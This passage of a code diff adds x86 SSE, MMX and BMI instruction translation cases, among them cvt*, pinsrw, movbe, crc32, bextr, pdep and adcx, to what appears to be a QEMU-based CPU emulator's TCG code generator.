tcg_gen_movi_tl(tcg_ctx, *cpu_T[0], val); + tcg_gen_st32_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State,mmx_t0.MMX_L(0))); + tcg_gen_movi_tl(tcg_ctx, *cpu_T[0], 0); + tcg_gen_st32_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State,mmx_t0.MMX_L(1))); + op1_offset = offsetof(CPUX86State,mmx_t0); + } + sse_fn_epp = sse_op_table2[((b - 1) & 3) * 8 + + (((modrm >> 3)) & 7)][b1]; + if (!sse_fn_epp) { + goto illegal_op; + } + if (is_xmm) { + rm = (modrm & 7) | REX_B(s); + op2_offset = offsetof(CPUX86State,xmm_regs[rm]); + } else { + rm = (modrm & 7); + 
op2_offset = offsetof(CPUX86State,fpregs[rm].mmx); + } + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr0, cpu_env, op2_offset); + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr1, cpu_env, op1_offset); + sse_fn_epp(tcg_ctx, cpu_env, cpu_ptr0, cpu_ptr1); + break; + case 0x050: /* movmskps */ + rm = (modrm & 7) | REX_B(s); + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr0, cpu_env, + offsetof(CPUX86State,xmm_regs[rm])); + gen_helper_movmskps(tcg_ctx, cpu_tmp2_i32, cpu_env, cpu_ptr0); + tcg_gen_extu_i32_tl(tcg_ctx, *cpu_regs[reg], cpu_tmp2_i32); + break; + case 0x150: /* movmskpd */ + rm = (modrm & 7) | REX_B(s); + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr0, cpu_env, + offsetof(CPUX86State,xmm_regs[rm])); + gen_helper_movmskpd(tcg_ctx, cpu_tmp2_i32, cpu_env, cpu_ptr0); + tcg_gen_extu_i32_tl(tcg_ctx, *cpu_regs[reg], cpu_tmp2_i32); + break; + case 0x02a: /* cvtpi2ps */ + case 0x12a: /* cvtpi2pd */ + gen_helper_enter_mmx(tcg_ctx, cpu_env); + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + op2_offset = offsetof(CPUX86State,mmx_t0); + gen_ldq_env_A0(s, op2_offset); + } else { + rm = (modrm & 7); + op2_offset = offsetof(CPUX86State,fpregs[rm].mmx); + } + op1_offset = offsetof(CPUX86State,xmm_regs[reg]); + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr0, cpu_env, op1_offset); + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr1, cpu_env, op2_offset); + switch(b >> 8) { + case 0x0: + gen_helper_cvtpi2ps(tcg_ctx, cpu_env, cpu_ptr0, cpu_ptr1); + break; + default: + case 0x1: + gen_helper_cvtpi2pd(tcg_ctx, cpu_env, cpu_ptr0, cpu_ptr1); + break; + } + break; + case 0x22a: /* cvtsi2ss */ + case 0x32a: /* cvtsi2sd */ + ot = mo_64_32(s->dflag); + gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); + op1_offset = offsetof(CPUX86State,xmm_regs[reg]); + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr0, cpu_env, op1_offset); + if (ot == MO_32) { + SSEFunc_0_epi sse_fn_epi = sse_op_table3ai[(b >> 8) & 1]; + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_T[0]); + sse_fn_epi(tcg_ctx, cpu_env, cpu_ptr0, cpu_tmp2_i32); + } else { +#ifdef TARGET_X86_64 + SSEFunc_0_epl sse_fn_epl = 
sse_op_table3aq[(b >> 8) & 1]; + sse_fn_epl(tcg_ctx, cpu_env, cpu_ptr0, *cpu_T[0]); +#else + goto illegal_op; +#endif + } + break; + case 0x02c: /* cvttps2pi */ + case 0x12c: /* cvttpd2pi */ + case 0x02d: /* cvtps2pi */ + case 0x12d: /* cvtpd2pi */ + gen_helper_enter_mmx(tcg_ctx, cpu_env); + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + op2_offset = offsetof(CPUX86State,xmm_t0); + gen_ldo_env_A0(s, op2_offset); + } else { + rm = (modrm & 7) | REX_B(s); + op2_offset = offsetof(CPUX86State,xmm_regs[rm]); + } + op1_offset = offsetof(CPUX86State,fpregs[reg & 7].mmx); + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr0, cpu_env, op1_offset); + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr1, cpu_env, op2_offset); + switch(b) { + case 0x02c: + gen_helper_cvttps2pi(tcg_ctx, cpu_env, cpu_ptr0, cpu_ptr1); + break; + case 0x12c: + gen_helper_cvttpd2pi(tcg_ctx, cpu_env, cpu_ptr0, cpu_ptr1); + break; + case 0x02d: + gen_helper_cvtps2pi(tcg_ctx, cpu_env, cpu_ptr0, cpu_ptr1); + break; + case 0x12d: + gen_helper_cvtpd2pi(tcg_ctx, cpu_env, cpu_ptr0, cpu_ptr1); + break; + } + break; + case 0x22c: /* cvttss2si */ + case 0x32c: /* cvttsd2si */ + case 0x22d: /* cvtss2si */ + case 0x32d: /* cvtsd2si */ + ot = mo_64_32(s->dflag); + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + if ((b >> 8) & 1) { + gen_ldq_env_A0(s, offsetof(CPUX86State, xmm_t0.XMM_Q(0))); + } else { + gen_op_ld_v(s, MO_32, *cpu_T[0], cpu_A0); + tcg_gen_st32_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State,xmm_t0.XMM_L(0))); + } + op2_offset = offsetof(CPUX86State,xmm_t0); + } else { + rm = (modrm & 7) | REX_B(s); + op2_offset = offsetof(CPUX86State,xmm_regs[rm]); + } + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr0, cpu_env, op2_offset); + if (ot == MO_32) { + SSEFunc_i_ep sse_fn_i_ep = + sse_op_table3bi[((b >> 7) & 2) | (b & 1)]; + sse_fn_i_ep(tcg_ctx, cpu_tmp2_i32, cpu_env, cpu_ptr0); + tcg_gen_extu_i32_tl(tcg_ctx, *cpu_T[0], cpu_tmp2_i32); + } else { +#ifdef TARGET_X86_64 + SSEFunc_l_ep sse_fn_l_ep = + sse_op_table3bq[((b >> 7) & 2) | (b & 
1)]; + sse_fn_l_ep(tcg_ctx, *cpu_T[0], cpu_env, cpu_ptr0); +#else + goto illegal_op; +#endif + } + gen_op_mov_reg_v(tcg_ctx, ot, reg, *cpu_T[0]); + break; + case 0xc4: /* pinsrw */ + case 0x1c4: + s->rip_offset = 1; + gen_ldst_modrm(env, s, modrm, MO_16, OR_TMP0, 0); + val = cpu_ldub_code(env, s->pc++); + if (b1) { + val &= 7; + tcg_gen_st16_tl(tcg_ctx, *cpu_T[0], cpu_env, + offsetof(CPUX86State,xmm_regs[reg].XMM_W(val))); + } else { + val &= 3; + tcg_gen_st16_tl(tcg_ctx, *cpu_T[0], cpu_env, + offsetof(CPUX86State,fpregs[reg].mmx.MMX_W(val))); + } + break; + case 0xc5: /* pextrw */ + case 0x1c5: + if (mod != 3) + goto illegal_op; + ot = mo_64_32(s->dflag); + val = cpu_ldub_code(env, s->pc++); + if (b1) { + val &= 7; + rm = (modrm & 7) | REX_B(s); + tcg_gen_ld16u_tl(tcg_ctx, *cpu_T[0], cpu_env, + offsetof(CPUX86State,xmm_regs[rm].XMM_W(val))); + } else { + val &= 3; + rm = (modrm & 7); + tcg_gen_ld16u_tl(tcg_ctx, *cpu_T[0], cpu_env, + offsetof(CPUX86State,fpregs[rm].mmx.MMX_W(val))); + } + reg = ((modrm >> 3) & 7) | rex_r; + gen_op_mov_reg_v(tcg_ctx, ot, reg, *cpu_T[0]); + break; + case 0x1d6: /* movq ea, xmm */ + if (mod != 3) { + gen_lea_modrm(env, s, modrm); + gen_stq_env_A0(s, offsetof(CPUX86State, + xmm_regs[reg].XMM_Q(0))); + } else { + rm = (modrm & 7) | REX_B(s); + gen_op_movq(tcg_ctx, offsetof(CPUX86State,xmm_regs[rm].XMM_Q(0)), + offsetof(CPUX86State,xmm_regs[reg].XMM_Q(0))); + gen_op_movq_env_0(tcg_ctx, offsetof(CPUX86State,xmm_regs[rm].XMM_Q(1))); + } + break; + case 0x2d6: /* movq2dq */ + gen_helper_enter_mmx(tcg_ctx, cpu_env); + rm = (modrm & 7); + gen_op_movq(tcg_ctx, offsetof(CPUX86State,xmm_regs[reg].XMM_Q(0)), + offsetof(CPUX86State,fpregs[rm].mmx)); + gen_op_movq_env_0(tcg_ctx, offsetof(CPUX86State,xmm_regs[reg].XMM_Q(1))); + break; + case 0x3d6: /* movdq2q */ + gen_helper_enter_mmx(tcg_ctx, cpu_env); + rm = (modrm & 7) | REX_B(s); + gen_op_movq(tcg_ctx, offsetof(CPUX86State,fpregs[reg & 7].mmx), + offsetof(CPUX86State,xmm_regs[rm].XMM_Q(0))); + 
break; + case 0xd7: /* pmovmskb */ + case 0x1d7: + if (mod != 3) + goto illegal_op; + if (b1) { + rm = (modrm & 7) | REX_B(s); + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr0, cpu_env, offsetof(CPUX86State,xmm_regs[rm])); + gen_helper_pmovmskb_xmm(tcg_ctx, cpu_tmp2_i32, cpu_env, cpu_ptr0); + } else { + rm = (modrm & 7); + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr0, cpu_env, offsetof(CPUX86State,fpregs[rm].mmx)); + gen_helper_pmovmskb_mmx(tcg_ctx, cpu_tmp2_i32, cpu_env, cpu_ptr0); + } + reg = ((modrm >> 3) & 7) | rex_r; + tcg_gen_extu_i32_tl(tcg_ctx, *cpu_regs[reg], cpu_tmp2_i32); + break; + + case 0x138: + case 0x038: + b = modrm; + if ((b & 0xf0) == 0xf0) { + goto do_0f_38_fx; + } + modrm = cpu_ldub_code(env, s->pc++); + rm = modrm & 7; + reg = ((modrm >> 3) & 7) | rex_r; + mod = (modrm >> 6) & 3; + if (b1 >= 2) { + goto illegal_op; + } + + sse_fn_epp = sse_op_table6[b].op[b1]; + if (!sse_fn_epp) { + goto illegal_op; + } + if (!(s->cpuid_ext_features & sse_op_table6[b].ext_mask)) + goto illegal_op; + + if (b1) { + op1_offset = offsetof(CPUX86State,xmm_regs[reg]); + if (mod == 3) { + op2_offset = offsetof(CPUX86State,xmm_regs[rm | REX_B(s)]); + } else { + op2_offset = offsetof(CPUX86State,xmm_t0); + gen_lea_modrm(env, s, modrm); + switch (b) { + case 0x20: case 0x30: /* pmovsxbw, pmovzxbw */ + case 0x23: case 0x33: /* pmovsxwd, pmovzxwd */ + case 0x25: case 0x35: /* pmovsxdq, pmovzxdq */ + gen_ldq_env_A0(s, op2_offset + + offsetof(XMMReg, XMM_Q(0))); + break; + case 0x21: case 0x31: /* pmovsxbd, pmovzxbd */ + case 0x24: case 0x34: /* pmovsxwq, pmovzxwq */ + tcg_gen_qemu_ld_i32(s->uc, cpu_tmp2_i32, cpu_A0, + s->mem_index, MO_LEUL); + tcg_gen_st_i32(tcg_ctx, cpu_tmp2_i32, cpu_env, op2_offset + + offsetof(XMMReg, XMM_L(0))); + break; + case 0x22: case 0x32: /* pmovsxbq, pmovzxbq */ + tcg_gen_qemu_ld_tl(s->uc, cpu_tmp0, cpu_A0, + s->mem_index, MO_LEUW); + tcg_gen_st16_tl(tcg_ctx, cpu_tmp0, cpu_env, op2_offset + + offsetof(XMMReg, XMM_W(0))); + break; + case 0x2a: /* movntqda */ + 
gen_ldo_env_A0(s, op1_offset); + return; + default: + gen_ldo_env_A0(s, op2_offset); + } + } + } else { + op1_offset = offsetof(CPUX86State,fpregs[reg].mmx); + if (mod == 3) { + op2_offset = offsetof(CPUX86State,fpregs[rm].mmx); + } else { + op2_offset = offsetof(CPUX86State,mmx_t0); + gen_lea_modrm(env, s, modrm); + gen_ldq_env_A0(s, op2_offset); + } + } + if (sse_fn_epp == SSE_SPECIAL) { + goto illegal_op; + } + + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr0, cpu_env, op1_offset); + tcg_gen_addi_ptr(tcg_ctx, cpu_ptr1, cpu_env, op2_offset); + sse_fn_epp(tcg_ctx, cpu_env, cpu_ptr0, cpu_ptr1); + + if (b == 0x17) { + set_cc_op(s, CC_OP_EFLAGS); + } + break; + + case 0x238: + case 0x338: + do_0f_38_fx: + /* Various integer extensions at 0f 38 f[0-f]. */ + b = modrm | (b1 << 8); + modrm = cpu_ldub_code(env, s->pc++); + reg = ((modrm >> 3) & 7) | rex_r; + + switch (b) { + case 0x3f0: /* crc32 Gd,Eb */ + case 0x3f1: /* crc32 Gd,Ey */ + do_crc32: + if (!(s->cpuid_ext_features & CPUID_EXT_SSE42)) { + goto illegal_op; + } + if ((b & 0xff) == 0xf0) { + ot = MO_8; + } else if (s->dflag != MO_64) { + ot = (s->prefix & PREFIX_DATA ? MO_16 : MO_32); + } else { + ot = MO_64; + } + + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_regs[reg]); + gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); + gen_helper_crc32(tcg_ctx, *cpu_T[0], cpu_tmp2_i32, + *cpu_T[0], tcg_const_i32(tcg_ctx, 8 << ot)); + + ot = mo_64_32(s->dflag); + gen_op_mov_reg_v(tcg_ctx, ot, reg, *cpu_T[0]); + break; + + case 0x1f0: /* crc32 or movbe */ + case 0x1f1: + /* For these insns, the f3 prefix is supposed to have priority + over the 66 prefix, but that's not what we implement above + setting b1. */ + if (s->prefix & PREFIX_REPNZ) { + goto do_crc32; + } + /* FALLTHRU */ + case 0x0f0: /* movbe Gy,My */ + case 0x0f1: /* movbe My,Gy */ + if (!(s->cpuid_ext_features & CPUID_EXT_MOVBE)) { + goto illegal_op; + } + if (s->dflag != MO_64) { + ot = (s->prefix & PREFIX_DATA ? 
MO_16 : MO_32); + } else { + ot = MO_64; + } + + gen_lea_modrm(env, s, modrm); + if ((b & 1) == 0) { + tcg_gen_qemu_ld_tl(s->uc, *cpu_T[0], cpu_A0, + s->mem_index, ot | MO_BE); + gen_op_mov_reg_v(tcg_ctx, ot, reg, *cpu_T[0]); + } else { + tcg_gen_qemu_st_tl(s->uc, *cpu_regs[reg], cpu_A0, + s->mem_index, ot | MO_BE); + } + break; + + case 0x0f2: /* andn Gy, By, Ey */ + if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_BMI1) + || !(s->prefix & PREFIX_VEX) + || s->vex_l != 0) { + goto illegal_op; + } + ot = mo_64_32(s->dflag); + gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); + tcg_gen_andc_tl(tcg_ctx, *cpu_T[0], *cpu_regs[s->vex_v], *cpu_T[0]); + gen_op_mov_reg_v(tcg_ctx, ot, reg, *cpu_T[0]); + gen_op_update1_cc(tcg_ctx); + set_cc_op(s, CC_OP_LOGICB + ot); + break; + + case 0x0f7: /* bextr Gy, Ey, By */ + if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_BMI1) + || !(s->prefix & PREFIX_VEX) + || s->vex_l != 0) { + goto illegal_op; + } + ot = mo_64_32(s->dflag); + { + TCGv bound, zero; + + gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); + /* Extract START, and shift the operand. + Shifts larger than operand size get zeros. */ + tcg_gen_ext8u_tl(tcg_ctx, cpu_A0, *cpu_regs[s->vex_v]); + tcg_gen_shr_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], cpu_A0); + + bound = tcg_const_tl(tcg_ctx, ot == MO_64 ? 63 : 31); + zero = tcg_const_tl(tcg_ctx, 0); + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_LEU, *cpu_T[0], cpu_A0, bound, + *cpu_T[0], zero); + tcg_temp_free(tcg_ctx, zero); + + /* Extract the LEN into a mask. Lengths larger than + operand size get all ones. 
*/ + tcg_gen_shri_tl(tcg_ctx, cpu_A0, *cpu_regs[s->vex_v], 8); + tcg_gen_ext8u_tl(tcg_ctx, cpu_A0, cpu_A0); + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_LEU, cpu_A0, cpu_A0, bound, + cpu_A0, bound); + tcg_temp_free(tcg_ctx, bound); + tcg_gen_movi_tl(tcg_ctx, *cpu_T[1], 1); + tcg_gen_shl_tl(tcg_ctx, *cpu_T[1], *cpu_T[1], cpu_A0); + tcg_gen_subi_tl(tcg_ctx, *cpu_T[1], *cpu_T[1], 1); + tcg_gen_and_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + + gen_op_mov_reg_v(tcg_ctx, ot, reg, *cpu_T[0]); + gen_op_update1_cc(tcg_ctx); + set_cc_op(s, CC_OP_LOGICB + ot); + } + break; + + case 0x0f5: /* bzhi Gy, Ey, By */ + if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_BMI2) + || !(s->prefix & PREFIX_VEX) + || s->vex_l != 0) { + goto illegal_op; + } + ot = mo_64_32(s->dflag); + gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); + tcg_gen_ext8u_tl(tcg_ctx, *cpu_T[1], *cpu_regs[s->vex_v]); + { + TCGv bound = tcg_const_tl(tcg_ctx, ot == MO_64 ? 63 : 31); + /* Note that since we're using BMILG (in order to get O + cleared) we need to store the inverse into C. 
*/ + tcg_gen_setcond_tl(tcg_ctx, TCG_COND_LT, cpu_cc_src, + *cpu_T[1], bound); + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_GT, *cpu_T[1], *cpu_T[1], + bound, bound, *cpu_T[1]); + tcg_temp_free(tcg_ctx, bound); + } + tcg_gen_movi_tl(tcg_ctx, cpu_A0, -1); + tcg_gen_shl_tl(tcg_ctx, cpu_A0, cpu_A0, *cpu_T[1]); + tcg_gen_andc_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], cpu_A0); + gen_op_mov_reg_v(tcg_ctx, ot, reg, *cpu_T[0]); + gen_op_update1_cc(tcg_ctx); + set_cc_op(s, CC_OP_BMILGB + ot); + break; + + case 0x3f6: /* mulx By, Gy, rdx, Ey */ + if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_BMI2) + || !(s->prefix & PREFIX_VEX) + || s->vex_l != 0) { + goto illegal_op; + } + ot = mo_64_32(s->dflag); + gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); + switch (ot) { + default: + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_T[0]); + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp3_i32, *cpu_regs[R_EDX]); + tcg_gen_mulu2_i32(tcg_ctx, cpu_tmp2_i32, cpu_tmp3_i32, + cpu_tmp2_i32, cpu_tmp3_i32); + tcg_gen_extu_i32_tl(tcg_ctx, *cpu_regs[s->vex_v], cpu_tmp2_i32); + tcg_gen_extu_i32_tl(tcg_ctx, *cpu_regs[reg], cpu_tmp3_i32); + break; +#ifdef TARGET_X86_64 + case MO_64: + tcg_gen_mulu2_i64(tcg_ctx, *cpu_T[0], *cpu_T[1], + *cpu_T[0], *cpu_regs[R_EDX]); + tcg_gen_mov_i64(tcg_ctx, *cpu_regs[s->vex_v], *cpu_T[0]); + tcg_gen_mov_i64(tcg_ctx, *cpu_regs[reg], *cpu_T[1]); + break; +#endif + } + break; + + case 0x3f5: /* pdep Gy, By, Ey */ + if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_BMI2) + || !(s->prefix & PREFIX_VEX) + || s->vex_l != 0) { + goto illegal_op; + } + ot = mo_64_32(s->dflag); + gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); + /* Note that by zero-extending the mask operand, we + automatically handle zero-extending the result. 
*/ + if (ot == MO_64) { + tcg_gen_mov_tl(tcg_ctx, *cpu_T[1], *cpu_regs[s->vex_v]); + } else { + tcg_gen_ext32u_tl(tcg_ctx, *cpu_T[1], *cpu_regs[s->vex_v]); + } + gen_helper_pdep(tcg_ctx, *cpu_regs[reg], *cpu_T[0], *cpu_T[1]); + break; + + case 0x2f5: /* pext Gy, By, Ey */ + if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_BMI2) + || !(s->prefix & PREFIX_VEX) + || s->vex_l != 0) { + goto illegal_op; + } + ot = mo_64_32(s->dflag); + gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); + /* Note that by zero-extending the mask operand, we + automatically handle zero-extending the result. */ + if (ot == MO_64) { + tcg_gen_mov_tl(tcg_ctx, *cpu_T[1], *cpu_regs[s->vex_v]); + } else { + tcg_gen_ext32u_tl(tcg_ctx, *cpu_T[1], *cpu_regs[s->vex_v]); + } + gen_helper_pext(tcg_ctx, *cpu_regs[reg], *cpu_T[0], *cpu_T[1]); + break; + + case 0x1f6: /* adcx Gy, Ey */ + case 0x2f6: /* adox Gy, Ey */ + if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_ADX)) { + goto illegal_op; + } else { + TCGv carry_in, carry_out, zero; + int end_op; + + ot = mo_64_32(s->dflag); + gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); + + /* Re-use the carry-out from a previous round. */ + TCGV_UNUSED(carry_in); + carry_out = (b == 0x1f6 ? cpu_cc_dst : cpu_cc_src2); + switch (s->cc_op) { + case CC_OP_ADCX: + if (b == 0x1f6) { + carry_in = cpu_cc_dst; + end_op = CC_OP_ADCX; + } else { + end_op = CC_OP_ADCOX; + } + break; + case CC_OP_ADOX: + if (b == 0x1f6) { + end_op = CC_OP_ADCOX; + } else { + carry_in = cpu_cc_src2; + end_op = CC_OP_ADOX; + } + break; + case CC_OP_ADCOX: + end_op = CC_OP_ADCOX; + carry_in = carry_out; + break; + default: + end_op = (b == 0x1f6 ? CC_OP_ADCX : CC_OP_ADOX); + break; + } + /* If we can't reuse carry-out, get it out of EFLAGS. */ + if (TCGV_IS_UNUSED(carry_in)) { + if (s->cc_op != CC_OP_ADCX && s->cc_op != CC_OP_ADOX) { + gen_compute_eflags(s); + } + carry_in = cpu_tmp0; + tcg_gen_shri_tl(tcg_ctx, carry_in, cpu_cc_src, + ctz32(b == 0x1f6 ? 
CC_C : CC_O)); + tcg_gen_andi_tl(tcg_ctx, carry_in, carry_in, 1); + } + + switch (ot) { +#ifdef TARGET_X86_64 + case MO_32: + /* If we know TL is 64-bit, and we want a 32-bit + result, just do everything in 64-bit arithmetic. */ + tcg_gen_ext32u_i64(tcg_ctx, *cpu_regs[reg], *cpu_regs[reg]); + tcg_gen_ext32u_i64(tcg_ctx, *cpu_T[0], *cpu_T[0]); + tcg_gen_add_i64(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_regs[reg]); + tcg_gen_add_i64(tcg_ctx, *cpu_T[0], *cpu_T[0], carry_in); + tcg_gen_ext32u_i64(tcg_ctx, *cpu_regs[reg], *cpu_T[0]); + tcg_gen_shri_i64(tcg_ctx, carry_out, *cpu_T[0], 32); + break; +#endif + default: + /* Otherwise compute the carry-out in two steps. */ + zero = tcg_const_tl(tcg_ctx, 0); + tcg_gen_add2_tl(tcg_ctx, *cpu_T[0], carry_out, + *cpu_T[0], zero, + carry_in, zero); + tcg_gen_add2_tl(tcg_ctx, *cpu_regs[reg], carry_out, + *cpu_regs[reg], carry_out, + *cpu_T[0], zero); + tcg_temp_free(tcg_ctx, zero); + break; + } + set_cc_op(s, end_op); + } + break; + + case 0x1f7: /* shlx Gy, Ey, By */ + case 0x2f7: /* sarx Gy, Ey, By */ + case 0x3f7: /* shrx Gy, Ey, By */ + if (!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_BMI2) + || !(s->prefix & PREFIX_VEX) + || s->vex_l != 0) { + goto illegal_op; + } + ot = mo_64_32(s->dflag); + gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); + if (ot == MO_64) { + tcg_gen_andi_tl(tcg_ctx, *cpu_T[1], *cpu_regs[s->vex_v], 63); + } else { + tcg_gen_andi_tl(tcg_ctx, *cpu_T[1], *cpu_regs[s->vex_v], 31); + } + if (b == 0x1f7) { + tcg_gen_shl_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + } else if (b == 0x2f7) { + if (ot != MO_64) { + tcg_gen_ext32s_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + } + tcg_gen_sar_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + } else { + if (ot != MO_64) { + tcg_gen_ext32u_tl(tcg_ctx, *cpu_T[0], *cpu_T[0]); + } + tcg_gen_shr_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + } + gen_op_mov_reg_v(tcg_ctx, ot, reg, *cpu_T[0]); + break; + + case 0x0f3: + case 0x1f3: + case 0x2f3: + case 0x3f3: /* Group 17 */ + if 
(!(s->cpuid_7_0_ebx_features & CPUID_7_0_EBX_BMI1) + || !(s->prefix & PREFIX_VEX) + || s->vex_l != 0) { + goto illegal_op; + } + ot = mo_64_32(s->dflag); + gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); + + switch (reg & 7) { + case 1: /* blsr By,Ey */ + tcg_gen_neg_tl(tcg_ctx, *cpu_T[1], *cpu_T[0]); + tcg_gen_and_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + gen_op_mov_reg_v(tcg_ctx, ot, s->vex_v, *cpu_T[0]); + gen_op_update2_cc(tcg_ctx); + set_cc_op(s, CC_OP_BMILGB + ot); + break; + + case 2: /* blsmsk By,Ey */ + tcg_gen_mov_tl(tcg_ctx, cpu_cc_src, *cpu_T[0]); + tcg_gen_subi_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], 1); + tcg_gen_xor_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], cpu_cc_src); + tcg_gen_mov_tl(tcg_ctx, cpu_cc_dst, *cpu_T[0]); + set_cc_op(s, CC_OP_BMILGB + ot); + break; + + case 3: /* blsi By, Ey */ + tcg_gen_mov_tl(tcg_ctx, cpu_cc_src, *cpu_T[0]); + tcg_gen_subi_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], 1); + tcg_gen_and_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], cpu_cc_src); + tcg_gen_mov_tl(tcg_ctx, cpu_cc_dst, *cpu_T[0]); + set_cc_op(s, CC_OP_BMILGB + ot); + break; + + default: + goto illegal_op; + } + break; + + default: + goto illegal_op; + } + break; + + case 0x03a: + case 0x13a: + b = modrm; + modrm = cpu_ldub_code(env, s->pc++); + rm = modrm & 7; + reg = ((modrm >> 3) & 7) | rex_r; + mod = (modrm >> 6) & 3; + if (b1 >= 2) { + goto illegal_op; + } + + sse_fn_eppi = sse_op_table7[b].op[b1]; + if (!sse_fn_eppi) { + goto illegal_op; + } + if (!(s->cpuid_ext_features & sse_op_table7[b].ext_mask)) + goto illegal_op; + + if (sse_fn_eppi == SSE_SPECIAL) { + ot = mo_64_32(s->dflag); + rm = (modrm & 7) | REX_B(s); + if (mod != 3) + gen_lea_modrm(env, s, modrm); + reg = ((modrm >> 3) & 7) | rex_r; + val = cpu_ldub_code(env, s->pc++); + switch (b) { + case 0x14: /* pextrb */ + tcg_gen_ld8u_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State, + xmm_regs[reg].XMM_B(val & 15))); + if (mod == 3) { + gen_op_mov_reg_v(tcg_ctx, ot, rm, *cpu_T[0]); + } else { + tcg_gen_qemu_st_tl(s->uc, 
*cpu_T[0], cpu_A0, + s->mem_index, MO_UB); + } + break; + case 0x15: /* pextrw */ + tcg_gen_ld16u_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State, + xmm_regs[reg].XMM_W(val & 7))); + if (mod == 3) { + gen_op_mov_reg_v(tcg_ctx, ot, rm, *cpu_T[0]); + } else { + tcg_gen_qemu_st_tl(s->uc, *cpu_T[0], cpu_A0, + s->mem_index, MO_LEUW); + } + break; + case 0x16: + if (ot == MO_32) { /* pextrd */ + tcg_gen_ld_i32(tcg_ctx, cpu_tmp2_i32, cpu_env, + offsetof(CPUX86State, + xmm_regs[reg].XMM_L(val & 3))); + if (mod == 3) { + tcg_gen_extu_i32_tl(tcg_ctx, *cpu_regs[rm], cpu_tmp2_i32); + } else { + tcg_gen_qemu_st_i32(s->uc, cpu_tmp2_i32, cpu_A0, + s->mem_index, MO_LEUL); + } + } else { /* pextrq */ +#ifdef TARGET_X86_64 + tcg_gen_ld_i64(tcg_ctx, cpu_tmp1_i64, cpu_env, + offsetof(CPUX86State, + xmm_regs[reg].XMM_Q(val & 1))); + if (mod == 3) { + tcg_gen_mov_i64(tcg_ctx, *cpu_regs[rm], cpu_tmp1_i64); + } else { + tcg_gen_qemu_st_i64(s->uc, cpu_tmp1_i64, cpu_A0, + s->mem_index, MO_LEQ); + } +#else + goto illegal_op; +#endif + } + break; + case 0x17: /* extractps */ + tcg_gen_ld32u_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State, + xmm_regs[reg].XMM_L(val & 3))); + if (mod == 3) { + gen_op_mov_reg_v(tcg_ctx, ot, rm, *cpu_T[0]); + } else { + tcg_gen_qemu_st_tl(s->uc, *cpu_T[0], cpu_A0, + s->mem_index, MO_LEUL); + } + break; + case 0x20: /* pinsrb */ + if (mod == 3) { + gen_op_mov_v_reg(tcg_ctx, MO_32, *cpu_T[0], rm); + } else { + tcg_gen_qemu_ld_tl(s->uc, *cpu_T[0], cpu_A0, + s->mem_index, MO_UB); + } + tcg_gen_st8_tl(tcg_ctx, *cpu_T[0], cpu_env, offsetof(CPUX86State, + xmm_regs[reg].XMM_B(val & 15))); + break; + case 0x21: /* insertps */ + if (mod == 3) { + tcg_gen_ld_i32(tcg_ctx, cpu_tmp2_i32, cpu_env, + offsetof(CPUX86State,xmm_regs[rm] + .XMM_L((val >> 6) & 3))); + } else { + tcg_gen_qemu_ld_i32(s->uc, cpu_tmp2_i32, cpu_A0, + s->mem_index, MO_LEUL); + } + 